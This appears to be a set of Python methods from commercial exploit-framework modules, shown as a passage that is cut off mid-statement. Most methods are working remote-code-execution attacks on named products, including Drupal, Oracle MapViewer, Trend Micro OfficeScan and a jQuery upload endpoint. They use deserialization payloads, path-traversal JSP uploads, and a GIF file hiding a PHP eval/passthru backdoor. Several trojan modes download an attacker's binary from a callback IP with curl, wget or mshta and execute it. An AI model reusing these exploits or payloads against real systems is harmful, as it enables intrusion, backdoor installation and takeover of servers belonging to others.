def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.sslport = int(self.argsDict.get("sslport", self.sslport)) self.https = int(self.argsDict.get("https", self.https)) self.basepath = self.argsDict.get("basepath", self.basepath) self.cmd = self.argsDict.get("cmd", self.cmd) if (self.argsDict.get("cmd", self.cmd) == ""): self.maketrojan() self.TROJANMODE = 1 self.cmd = "rm -f /tmp/" + self.trojanname + "; /usr/bin/curl -o /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; /bin/chmod 777 /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) ua.addHeader( "User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1" ) ua.addHeader("Content-Type", "text/xml") # Exploitation params = """<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/bin/sh</string> <string>-c</string> <string>%s</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry>""" % self.cmd url = "/ws/rest/v1/d2" mainurl = "%s://%s:%d/%s%s" % (self.protocol, self.host, self.port, self.basepath, url) data = ua.POST(mainurl, params) if self.TROJANMODE == 0: self.log('[D2] %s' % (data.split('<!DOCTYPE html>')[0])) return 1
def upload_file(self): # Open JSP file f = open(self.filename, "r") fdata = f.read() f.close() fdata = fdata.replace("CALLBACK_IP", self.callback.ip) fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port)) json = """ { "type": "FeatureCollection", "features": [ { "type": "Feature", "geometry": { "type": "LineString", "coordinates": [ [ 1.061553955078125, 48.3416461723746 ], [ 5.719757080078125, 48.2246726495652 ], [ 3.434600830078125, 45.21300355599396 ], [ 1.061553955078125, 48.3416461723746 ] ] }, "properties": {} } ] } """ fdata = json+fdata if self.https == 0: self.protocol = "http" else: self.protocol = "https" self.port = self.sslport ua = spkproxy.UserAgent("", exploit=self) # Upload JSP file params = '-----------------363752669374944\r\nContent-Disposition: form-data; name="fileName"\r\n\r\n../../../../d2.jsp\r\n-----------------363752669374944\r\nContent-Disposition: form-data; name="layerFile"\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------363752669374944--\r\n'%(len(fdata), fdata) url = '/mapviewer/addmapdata' mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) ua.addHeader("Content-Type", "multipart/form-data; boundary=---------------363752669374944") ua.addHeader("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1") data = ua.POST(mainurl, params) # Execute uploaded JSP file url = "/mapviewer/d2.jsp" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) return 1
def __init__(self): canvasexploit.__init__(self) #hostname="http://google.com" #elf.hostname=hostname self.ua = spkproxy.UserAgent("") #placeholder self.name = "" #self.ssl="" self.webserverport = 0 #set to non-zero to make it an RFI exploit self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\ chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\ chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\ chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\ chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\ chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+\ """<?php error_reporting(0); ini_set('max_execution_time',0); print 'startz'; passthru(base64_decode($_REQUEST[SERVER_INFO])); eval(base64_decode($_REQUEST[SERVER_INFO2])); print 'endz'; exit; ?>"""+\ chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\ chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\ chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\ chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\ chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\ chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\ chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\ chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\ chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\ chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\ chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\ chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\ chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\ chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\ chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\ chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\ chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\ chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\ chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\ chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\ chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\ chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\ chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\ chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\ chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\ chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\ chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\ chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\ chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\ chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\ chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\ chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\ chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\ chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\ chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\ chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\ chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\ chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\ chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\ chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\ chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\ chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\ chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\ chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\ chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\ chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\ chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\ chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\ chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\ chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\ chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\ chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\ chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\ chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\ chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\ chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\ chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\ chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\ chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\ chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\ chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\ chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\ chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\ chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00) self.log_paths = [ "../../../../../var/log/apache2/access.log", "../../../../../var/log/apache2/error.log", "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../../../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log", "../../../../../../var/log/apache2/error.log" ]
def start(self, widget): self.treestore_3.clear() hostentry = self.wTree2.get_widget("selectedhost") self.qhost = hostentry.get_text() if self.qhost == "": self.log("[D2 LOG] ERROR: Nessus Server IP is empty") return portentry = self.wTree2.get_widget("serverport") self.port = portentry.get_text() if self.port == "": self.log("[D2 LOG] ERROR: Nessus Server port is empty") return loginentry = self.wTree2.get_widget("login") self.login = loginentry.get_text() if self.login == "": self.log("[D2 LOG] ERROR: Nessus login is empty") return pwdentry = self.wTree2.get_widget("password") self.password = pwdentry.get_text() if self.password == "": self.log("[D2 LOG] ERROR: Nessus password is empty") return postdata = { 'username': self.login, 'password': self.password, } urldata = json.dumps(postdata) mainurl = "https://" + self.qhost + ":" + self.port headers = [("Content-Type", "application/json")] # Login and get token UA = spkproxy.UserAgent(mainurl, exploit=self) data = UA.POST(self.loginurl, data=urldata, extraheaders=headers) response = json.loads(data) if "token" not in response: self.log("[D2 LOG] Nessus ACCESS DENIED") return self.token = response["token"] UA.addHeader("X-Cookie", "token=%s" % self.token) # Get scan list data = UA.GET(self.scanurl) response = json.loads(data) # Download scan list and update treeview if "scans" not in response: self.log("[D2 LOG] No scan available") return for scan in response["scans"]: self.treestore_3.append(None, [ scan["name"], time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime(int(scan["creation_date"]))), scan["id"] ])
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.sslport = int(self.argsDict.get("sslport", self.sslport)) self.https = int(self.argsDict.get("https", self.https)) self.basepath = self.argsDict.get("basepath", self.basepath) self.cmd = self.argsDict.get("cmd", self.cmd) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.maketrojan() self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname self.cmd += "&& chmod 777 /tmp/" + self.trojanname self.cmd += "&& /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) if self.https == 0: self.protocol = "http" else: self.protocol = "https" self.port = self.sslport ua = spkproxy.UserAgent("", exploit=self) url = "/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=" mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port, self.basepath, url, urllib.quote(self.cmd)) params = urllib.urlencode({ '_triggering_element_name': 'name', 'form_id': 'user_pass' }) data = ua.POST(mainurl, params) m = re.search('name="form_build_id" value="([^"]+)"', data) if m is None: self.log('[D2] form_build_id not found') return 0 form_build_id = m.group(1) url = "/?q=file/ajax/name/%23default_value/" mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port, self.basepath, url, form_build_id) params = urllib.urlencode({'form_build_id': form_build_id}) data = ua.POST(mainurl, params) if self.TROJANMODE == 0: m = re.search('(.+?)\\[\\{"command":"settings","settings"', data, re.DOTALL) if m is not None: self.log('[D2] %s' % m.group(1).strip()) else: self.log(data) return 1
def download(self, widget): self.SelectedScan = [] column_names = ['Name', 'Date', 'Reference'] gladefile = self.exploitpath + "simple2.glade" self.wTree2 = gtk.glade.XML(gladefile) dic = {"on_start_clicked" : self.start, "on_delreport_toggled" : self.activatedel, "on_deselectall_clicked" : self.deselectall, "on_selectall_clicked" : self.selectall} self.wTree2.signal_autoconnect(dic) self.loaddlg = self.wTree2.get_widget("exploit_dialog") try: self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico") except: pass # Init reports treeview self.treeview_3 = self.wTree2.get_widget("mytree") self.treestore_3 = gtk.TreeStore(str, str, str) self.treeview_3.set_show_expanders(False) self.treeview_3.set_model(self.treestore_3) self.treeselection = self.treeview_3.get_selection() self.treeselection.set_mode(gtk.SELECTION_MULTIPLE) column = [None] * len(column_names) column[0] = gtk.TreeViewColumn(column_names[0], gtk.CellRendererText(), text=0) column[0].set_resizable(True) column[0].set_sort_column_id(0) column[1] = gtk.TreeViewColumn(column_names[1], gtk.CellRendererText(), text=1) column[1].set_resizable(True) column[1].set_sort_column_id(1) column[2] = gtk.TreeViewColumn(column_names[2], gtk.CellRendererText(), text=2) column[2].set_resizable(True) column[2].set_sort_column_id(2) self.treeview_3.append_column(column[0]) self.treeview_3.append_column(column[1]) self.treeview_3.append_column(column[2]) # Start downloader dialog result = self.loaddlg.run() if (result == gtk.RESPONSE_OK): if (self.treeselection.count_selected_rows() > 0): model, paths = self.treeselection.get_selected_rows() for p in paths: iter = self.treestore_3.get_iter(p) tmpRef = model.get_value(iter, 2) self.SelectedScan.append(tmpRef) for ref in self.SelectedScan: postdata = { 'login': self.login, 'password': self.password, 'submit': 'submit' } urldata = urllib.urlencode(postdata) mainurl = "https://" + self.qhost + ":" + self.port UA = spkproxy.UserAgent(mainurl, exploit=self) UA.POST(self.loginurl, data=urldata) postdata = { 'report': ref, 'submit': 'submit' } urldata = urllib.urlencode(postdata) data = UA.POST(self.reporturl, data=urldata) if "you are not authorized to perform this request" in data.lower(): self.log("[D2 LOG] Nessus ACCESS DENIED") continue if not os.path.exists(self.exploitpath + "reports/"): os.mkdir(self.exploitpath + "reports/") filename = self.exploitpath + "reports/" + ref.replace("/", "_") f = open(filename, "w") f.write(data) f.close() self.ReportFiles.append(filename); self.treestore_2.append(None, [filename]) else: self.log("[D2 LOG] - No Nessus report selected") self.loaddlg.destroy()
def run(self): self.getargs() #test = self.test() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port)) logging.info("Attacking %s:%d" % (self.hostname, self.port)) logging.info("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" auth = None if self.basicauth_user != "": auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) fname_shell = randomstring( 16 ) + ".php" #''.join(random.choice(string.ascii_letters) for _ in range(16)) # fname_multipart_data = self.getfile(fname_shell) found_path = False useragentstring = '' vulnerable_path = '' for jquery_path in self.jquery_paths: useragentstring = protocol + "://" + self.host + ":" + str( self.port) + "/" + self.basepath UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self) for vulpath in self.vulnpaths: UA.addHeader( "Content-Type", "multipart/form-data; boundary=---------------------------3922242971797626524322043819" ) vulnerable_path = jquery_path + vulpath logging.info( "Checking for vulnerable path: {}".format(useragentstring + vulnerable_path)) response, response_code = UA.POST(vulnerable_path, fname_multipart_data, return_response_code=True) if response_code == 200: found_path = True break vulnerable_path = jquery_path + vulpath + "/" + randomstring( 10) logging.info( "Checking for vulnerable path: {}".format(useragentstring + vulnerable_path)) response, response_code = UA.POST(vulnerable_path, fname_multipart_data, return_response_code=True) if response_code == 200: found_path = True break if found_path: logging.warning( "Found vulnerable path: {}".format(useragentstring + vulnerable_path)) break # Wait for the upload time.sleep(3) ret = 0 if found_path: UA.clearHeaders() for upload_path in self.upload_paths: test_path = jquery_path + upload_path + fname_shell logging.info("Triggering our uploaded callback: {}".format( useragentstring + test_path)) UA.GET(test_path, noresponse=True) for i in xrange(0, 5): #wait five seconds for callback time.sleep(1) ret = self.ISucceeded() if ret: break if ret: break if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) if (self.argsDict.get("cmd", self.cmd) == ""): self.maketrojan() self.TROJANMODE = 1 self.cmd = "mshta.exe http://" + self.callback.ip + "/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = "%s>repository/widgetPool/wp1/proxy/modTMCSS/d2" % self.argsDict.get( "cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) ua.addHeader( "User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1" ) # Init url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0016" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) # Get LoginTicket url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0009" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) m = re.search('"LoginTicket" : ([0-9]+)', data) if m is None: self.log("[D2SEC] LoginTicket not found") return 0 loginticket = m.group(1) # Create encrypted password m = hashlib.md5() m.update(self.password) md5 = m.hexdigest() txt = md5 + loginticket n = hashlib.sha256() n.update(txt) sha256 = n.hexdigest() # Authentication url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'TxtAccount': self.username, 'TMlogonEncrypted': sha256 }) data = ua.POST(mainurl, params) if "unable" in data: self.log("[D2SEC] Authentication error") return 0 # Init cookies url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0010" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) url = "/officescan/console/html/widget/index.php" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) # Exploitation url = "/officescan/console/html/widget/proxy_controller.php" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'module': 'modTMCSS', 'serverid': '1', 'T': 'D2 & %s' % self.cmd }) data = ua.POST(mainurl, params) self.log("[D2SEC] %s" % data) if self.TROJANMODE == 0: url = "/officescan/console/html/widget/repository/widgetPool/wp1/proxy/modTMCSS/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) self.log("[D2SEC] %s" % data) return 1
def run(self): self.getArgs() useragentstring = "https://" + self.host + ":%s" % self.port + "/" UA = spkproxy.UserAgent(useragentstring, auth=None, hostname=self.host, exploit=self) self.log("WP> Sending Exploit Stage 1 - Authentication Bypass") data = UA.POST("login.php", "button=Login&attempt=1&uname=-%s" % wp_randomstring(1), extraheaders=None, noresponse=False) eval_file = "_" + wp_randomstring(4) + "_" + ".php" eval_code = wp_randomstring( 1 ) + "%26cmd%20/c%20echo%20\"%3c%3f%70%68%70%20%65%76%61%6c%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%24%5f%47%45%54%5b%63%5d%29%29%3b%20%3f%3e\">%20" + eval_file + "&dir" UA.SetCookie("olist", eval_code) data = UA.POST("property_box.php", "type=Dataset&objectname[]=%s" % (wp_randomstring(1)), extraheaders=None, noresponse=True) UA.ClearCookies() time.sleep(2) if self.command: command = "system(\"" + self.command + "\");" self.log("WP> Sending Exploit Stage 2 - Executing Command: %s" % self.command) data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()), noresponse=False) self.log(data) time.sleep(2) command = "system(\"del /Q /F " + eval_file + "\");" data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()), noresponse=False) ret = 1 else: command = self.get_php_to_mosdef().strip() self.log("WP> Sending Exploit Stage 2: Payload\n") data = UA.GET("%s?c=%s" % (eval_file, 